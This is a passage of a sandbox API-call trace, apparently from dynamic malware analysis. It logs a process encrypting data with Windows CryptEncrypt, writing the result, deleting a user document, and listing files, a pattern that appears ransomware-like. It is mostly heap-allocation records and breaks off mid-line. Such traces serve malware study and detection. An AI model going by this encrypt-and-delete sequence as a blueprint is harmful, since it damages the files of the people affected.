[0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0084.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0084.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0084.082] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0084.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0084.082] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.082] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caca0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0084.083] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x10) returned 1 [0084.083] CharLowerBuffW (in: lpsz="byte[17]", cchLength=0x8 | out: lpsz="byte[17]") returned 0x8 [0084.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0084.083] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1796de8*, pdwDataLen=0x144e538*=0x0, dwBufLen=0x10 | out: pbData=0x1796de8*, pdwDataLen=0x144e538*=0x10) returned 1 [0084.083] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0084.083] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0084.083] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.084] WriteFile (in: hFile=0x298, lpBuffer=0x43caf88*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x43caf88*, lpNumberOfBytesWritten=0x144ef3c*=0x10, lpOverlapped=0x0) returned 1 [0084.085] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0084.085] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0084.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caef8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0084.085] CryptDestroyKey (hKey=0x41ac700) returned 1 [0084.085] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0084.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0084.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.085] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0084.086] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0084.086] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.086] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.086] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0084.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0084.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0084.086] CryptReleaseContext (hProv=0x41a4838, dwFlags=0x0) returned 1 [0084.086] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.086] FreeLibrary (hLibModule=0x756e0000) returned 1 [0084.086] CloseHandle (hObject=0x258) returned 1 [0084.095] CloseHandle (hObject=0x298) returned 1 [0084.098] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\Favorites.vssx", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Shapes\\Favorites.vssx", lpFilePart=0x0) returned 0x32 [0084.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0084.098] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\Favorites.vssx" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\favorites.vssx")) returned 0x20 [0084.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0084.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0084.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0084.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0084.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0084.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0084.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0084.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0084.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0084.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0084.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0084.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0084.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0084.099] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\Favorites.vssx", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1a0f60e, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1a0f60e, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Favorites.vssx", cAlternateFileName="FAVORI~1.VSS")) returned 0x41ac200 [0084.099] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\Favorites.vssx" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\favorites.vssx")) returned 1 [0084.099] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1a0f60e, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1a0f60e, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Favorites.vssx", cAlternateFileName="FAVORI~1.VSS")) returned 0 [0084.100] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0084.100] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0084.100] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0084.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0084.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0084.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0084.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0084.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0084.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0084.101] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0084.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0084.101] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0084.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0084.101] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0084.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0084.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0084.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0084.101] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0084.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0084.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0084.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0084.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0084.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0084.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0084.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0084.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0084.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0084.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2500 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0084.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0084.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0084.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0084.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0084.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0084.103] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0084.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0084.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0084.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0084.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0084.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0084.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0084.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0084.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0084.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0084.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0084.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0084.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0084.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0084.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.105] PeekMessageW (in: lpMsg=0x144f004, 